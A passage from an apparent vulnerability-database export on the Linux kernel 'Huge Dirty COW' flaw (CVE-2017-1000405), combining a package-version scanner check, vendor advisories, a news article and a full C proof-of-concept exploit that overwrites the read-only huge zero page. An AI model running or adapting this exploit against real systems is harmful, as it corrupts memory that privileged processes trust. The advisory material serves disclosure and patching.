isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1079.79\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1081.73\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)", "edition": 1, "published": "2017-11-30T00:00:00", "title": "Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-11-30T00:00:00", "id": "EXPLOITPACK:D8B1BFCB08D0FAA92CCBDBD01EF88A3F", "href": "", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\n//\n\n//\n// The Huge Dirty Cow POC. 
This program overwrites the system's huge zero page.\n// Compile with \"gcc -pthread main.c\"\n//\n// November 2017\n// Bindecy\n//\n\n#define _GNU_SOURCE\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <fcntl.h> \n#include <unistd.h> \n#include <sched.h>\n#include <string.h>\n#include <pthread.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <sys/wait.h> \n\n#define MAP_BASE ((void *)0x4000000)\n#define MAP_SIZE (0x200000)\n#define MEMESET_VAL (0x41)\n#define PAGE_SIZE (0x1000)\n#define TRIES_PER_PAGE (20000000)\n\nstruct thread_args {\n char *thp_map;\n char *thp_chk_map;\n off_t off;\n char *buf_to_write;\n int stop;\n int mem_fd1;\n int mem_fd2;\n};\n\ntypedef void * (*pthread_proc)(void *);\n\nvoid *unmap_and_read_thread(struct thread_args *args) {\n char c;\n int i;\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\n \n memcpy(&c, args->thp_map + args->off, sizeof(c));\n read(args->mem_fd2, &c, sizeof(c));\n \n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\n usleep(10); // We placed the zero page and marked its PMD as dirty. 
\n // Give get_user_pages() another chance before madvise()-ing again.\n }\n \n return NULL;\n}\n\nvoid *write_thread(struct thread_args *args) {\n int i;\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\n }\n \n return NULL;\n}\n\nvoid *wait_for_success(struct thread_args *args) {\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\n sched_yield();\n }\n\n args->stop = 1;\n return NULL;\n}\n\nint main() {\n struct thread_args args;\n void *thp_chk_map_addr;\n int ret;\n\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n if (args.thp_map == MAP_FAILED) {\n perror(\"[!] mmap()\");\n return -1;\n }\n if (args.thp_map != MAP_BASE) {\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\n goto err_unmap1;\n }\n \n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\n\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \n if (args.thp_chk_map == MAP_FAILED) {\n perror(\"[!] mmap()\");\n goto err_unmap1;\n }\n if (args.thp_chk_map != thp_chk_map_addr) {\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\n goto err_unmap2;\n }\n \n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\n if (ret) {\n perror(\"[!] madvise()\");\n goto err_unmap2;\n }\n\n args.buf_to_write = malloc(PAGE_SIZE);\n if (!args.buf_to_write) {\n perror(\"[!] 
malloc()\");\n goto err_unmap2;\n }\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\n \n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\n if (args.mem_fd1 < 0) {\n perror(\"[!] open()\");\n goto err_free;\n }\n \n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\n if (args.mem_fd2 < 0) {\n perror(\"[!] open()\");\n goto err_close1;\n }\n\n printf(\"[*] Racing. Gonna take a while...\\n\");\n args.off = 0;\n\n // Overwrite every single page\n while (args.off < MAP_SIZE) { \n pthread_t threads[3]; \n args.stop = 0;\n \n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\n \n if (ret) {\n perror(\"[!] pthread_create()\");\n goto err_close2;\n }\n \n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\n pthread_join(threads[1], NULL);\n pthread_join(threads[2], NULL);\n\n args.off += PAGE_SIZE; \n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\n }\n \n printf(\"[*] Success!\\n\");\n \nerr_close2:\n close(args.mem_fd2);\nerr_close1:\n close(args.mem_fd1);\nerr_free:\n free(args.buf_to_write);\nerr_unmap2:\n munmap(args.thp_chk_map, MAP_SIZE);\nerr_unmap1:\n munmap(args.thp_map, MAP_SIZE);\n \n if (ret) {\n fprintf(stderr, \"[!] Exploit failed.\\n\");\n }\n \n return ret;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5753", "CVE-2017-1000407"], "description": "[4.1.12-112.14.13]\n- Revert 'kernel.spec: Require the new microcode_ctl.' 
(Brian Maly)\n[4.1.12-112.14.12]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: pull nseg validation out in a function (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) [Orabug: 27386890] \n- x86: Clean up IBRS functionality resident in common code (Kanth Ghatraju) [Orabug: 27403317] \n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) [Orabug: 27403317] \n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: 27403317] \n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas Gleixner) [Orabug: 27403317] \n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) [Orabug: 27403317] \n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317] \n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: 27403317] \n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: 27403317] \n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) {CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) [Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: 27397568] \n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) [Orabug: 27397001]", "edition": 4, "modified": "2018-01-18T00:00:00", "published": "2018-01-18T00:00:00", "id": "ELSA-2018-4017", "href": "http://linux.oracle.com/errata/ELSA-2018-4017.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-12192", "CVE-2017-16650", "CVE-2017-2618", "CVE-2017-1000405", 
"CVE-2017-12190"], "description": "[4.1.12-103.10.1]\n- mm, thp: Do not make page table dirty unconditionally in follow_trans_huge_pmd() (Kirill A. Shutemov) [Orabug: 27200879] {CVE-2017-1000405}\n- NFS: Add static NFS I/O tracepoints (Chuck Lever) \n- storvsc: dont assume SG list is contiguous (Aruna Ramakrishna) [Orabug: 27044692] \n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069038] {CVE-2017-12190}\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069038] {CVE-2017-12190}\n- packet: in packet_do_bind, test fanout with bind_lock held (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- packet: hold bind lock when rebinding to fanout hook (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- net: convert packet_fanout.sk_ref from atomic_t to refcount_t (Reshetova, Elena) [Orabug: 27069065] {CVE-2017-15649}\n- packet: fix races in fanout_add() (Eric Dumazet) [Orabug: 27069065] {CVE-2017-15649}\n- refcount_t: Introduce a special purpose refcount type (Peter Zijlstra) [Orabug: 27069065] {CVE-2017-15649}\n- locking/atomics: Add _{acquire|release|relaxed}() variants of some atomic operations (Will Deacon) [Orabug: 27069065] {CVE-2017-15649}\n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215225] {CVE-2017-16650}\n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148276] {CVE-2017-16527}\n- scsi: Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan D. 
Milne) [Orabug: 27187217] \n- ocfs2: fix posix_acl_create deadlock (Junxiao Bi) [Orabug: 27126129] \n- scsi: Dont abort scsi_scan due to unexpected response (John Sobecki) [Orabug: 27119628] \n- ocfs2: code clean up for direct io (Ryan Ding) \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27076919] \n- KVM: nVMX: Fix loss of L2s NMI blocking state (Wanpeng Li) [Orabug: 27062498] \n- KVM: nVMX: track NMI blocking state separately for each VMCS (Paolo Bonzini) [Orabug: 27062498] \n- KVM: VMX: require virtual NMI support (Paolo Bonzini) [Orabug: 27062498] \n- KVM: nVMX: Fix the NMI IDT-vectoring handling (Wanpeng Li) [Orabug: 27062498] \n- uek-rpm: disable CONFIG_NUMA_BALANCING_DEFAULT_ENABLED (Fred Herard) [Orabug: 26798697] \n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. Shutemov) [Orabug: 27026180] \n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001717] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036903] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050248] {CVE-2017-12192}\n- IB/ipoib: For sendonly join free the multicast group on leave (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: increase the max mcast backlog queue (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Make sendonly multicast joins create the mcast group (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Expire sendonly multicast joins (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: Suppress warning for send only join failures (Jason Gunthorpe) [Orabug: 27077718] \n- IB/ipoib: Clean up send-only multicast joins (Doug Ledford) [Orabug: 27077718] \n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27077944] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077944] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) 
[Orabug: 27077944] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052681] \n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Brian Maly) [Orabug: 27037811]", "edition": 4, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "ELSA-2017-3651", "href": "http://linux.oracle.com/errata/ELSA-2017-3651.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_38 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:18:39", "published": "2017-12-14T15:18:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00043.html", "id": "SUSE-SU-2017:3297-1", "title": "Security update for the Linux Kernel (Live Patch 13 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_32 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:08:28", "published": "2017-12-14T15:08:28", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00031.html", "id": "SUSE-SU-2017:3284-1", "title": "Security update for the Linux Kernel (Live Patch 11 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_29 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:20:54", "published": "2017-12-14T15:20:54", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00045.html", "id": "SUSE-SU-2017:3300-1", "title": "Security update for the Linux Kernel (Live Patch 10 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.90-92_45 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:09:20", "published": "2017-12-14T15:09:20", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00032.html", "id": "SUSE-SU-2017:3285-1", "title": "Security update for the Linux Kernel (Live Patch 14 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_35 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:16:46", "published": "2017-12-14T15:16:46", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00041.html", "id": "SUSE-SU-2017:3295-1", "title": "Security update for the Linux Kernel (Live Patch 12 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "edition": 1, "modified": "2017-12-06T21:09:39", "published": "2017-12-06T21:09:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00012.html", "id": "SUSE-SU-2017:3226-1", "title": "Security update for the Linux Kernel (important)", "type": 
"suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.90-6_12 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n", "edition": 1, "modified": "2017-12-14T21:12:53", "published": "2017-12-14T21:12:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00061.html", "id": "SUSE-SU-2017:3317-1", "title": "Security update for the Linux Kernel (Live Patch 4 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.82-6_6 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T21:16:54", "published": "2017-12-14T21:16:54", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00068.html", "id": "SUSE-SU-2017:3324-1", "title": "Security update for the Linux Kernel (Live Patch 2 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.82-6_3 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T21:13:56", "published": "2017-12-14T21:13:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00063.html", "id": "SUSE-SU-2017:3319-1", "title": "Security update for the Linux Kernel (Live Patch 1 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "edition": 1, "modified": "2017-12-06T21:08:45", "published": "2017-12-06T21:08:45", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00011.html", "id": "SUSE-SU-2017:3225-1", "title": "Security update for the Linux Kernel (important)", "type": 
"suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:03", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2017-1000405"], "description": "A flaw in the original patch for the notorious Dirty COW vulnerability could allow an adversary to run local code on affected systems and exploit a race condition to perform a privilege escalation attack.\n\nThe flaw in the Dirty COW patch (CVE-2016-5195), [released in October 2016](<https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/>), was identified by researchers at the security firm Bindecy. On Wednesday, [they released details](<http://www.openwall.com/lists/oss-security/2017/11/30/1>) of the vulnerability ([CVE-2017-1000405](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405>)) found in the original Dirty COW patch, affecting several Linux distributions.\n\nThe scope of affected products is significantly smaller than the original Dirty COW bug, which impacted many more Linux distributions and the Android operating system.\n\n\u201cIn terms of scope, the difference is just that the current bug is not [applicable to Android](<https://threatpost.com/google-releases-supplemental-patch-for-dirty-cow-vulnerability/121843/>) and Red Hat Enterprise Linux. All other distributions \u2013 Ubuntu, Fedora, SUSE \u2013 suffer from the issue. So, the scope is still large. 
We estimate that millions of machines are vulnerable,\u201d said Daniel Shapiro, researcher at Bindecy, credited for finding the flaw along with colleague Eylon Ben Yaakov.\n\nThe vulnerability, CVE-2017-1000405, is rated \u201cImportant\u201d and scores 6.1 on the CVSS scale.\n\nRed Hat Software notified customers of the flawed patch on Thursday noting the issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5, 6, 7 and Red Hat Enterprise MRG 2, according to Red Hat\u2019s [customer portal](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\nDirty COW was patched in October 2016 after it was discovered in public exploits. The vulnerability was found in the copy-on-write (COW) feature in Linux and could be used by an attacker with local access to obtain root privileges on a Linux or Android device.\n\nThe flaw, which was introduced in 2007 in version 2.6.22 of the kernel, allows an attacker to elevate privileges by taking advantage of a race condition and gain write-access to read-only memory.\n\nThe flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.\n\nCopy-on-write manages memory resources and allows for more than one process to share a page until a user writes to it, known in programming as marking a page dirty. 
The vulnerability allows an attacker to exploit the race condition to write to the original page before it\u2019s marked dirty.\n\nThe October 2016 patch addressed the Dirty COW vulnerability for both regular pages and transparent huge pages (supported since kernel approximately 2.6.38), according to Shapiro.\n\n\u201cThere is a code flow that wasn\u2019t taken into account that breaks the logic of the patch for transparent huge pages,\u201d he said.\n\n\u201cIn the original vulnerability the exploit targeted pages backed by read-only files, with the new bug we could write to a read-only special huge-page called \u2018zero page\u2019. It is assumed to be initialized with zeroes and some software rely on that assumption (including privileged processes),\u201d Shapiro said.\n\nA more detailed description of the flaw can be found in a technical write-up by Yaakov [here](<https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0>).\n\nAccording to the disclosure timeline, researchers reported the vulnerability to the Linux Kernel Organization on Nov. 22. A CVE was assigned the same day and a patch was committed to the mainline kernel Nov. 27. The vulnerability was officially made public on Friday.\n\nImmediate mitigation includes disabling the use of \u201czero page\u201d.\n\n\u201cIt is possible to prevent the zero page from being mapped as a huge page, by modifying a configuration tunable in the /sys directory\u2026 This prevents the flaw from being exercised in this method. 
